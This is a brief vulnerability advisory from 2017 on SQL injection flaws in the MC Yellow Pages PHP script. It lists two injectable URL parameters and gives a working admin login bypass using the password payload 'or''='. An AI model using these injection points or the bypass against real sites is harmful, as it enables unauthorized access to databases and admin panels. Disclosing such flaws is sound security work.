MC Yellow Pages SQL Injection
Posted on 17 January 2017
# # # # # # Vulnerability: SQL Injection Web Vulnerability # Date: 15.01.2017 # Vendor Homepage: http://microcode.ws/ # Script Name: MC Yellow Pages Script # Script Buy Now: http://microcode.ws/product/mc-yellow-pages-php-script/3800 # Author: Adeghsan Aencan # Author Web: http://ihsan.net # Mail : ihsan[beygir]ihsan[nokta]net # # # # # # SQL Injection/Exploit : # http://localhost/[PATH]/details.php?list_id=[SQL] # http://localhost/[PATH]/category.php?cat_id=[SQL] # E.t.c.... Don't look for nothing there are also security vulnerabilities in other files as well. # # Admin Login Bypass # http://localhost/[PATH]/admin/ and set Mail:1@1.com and Password to 'or''=' and hit enter. # # # # #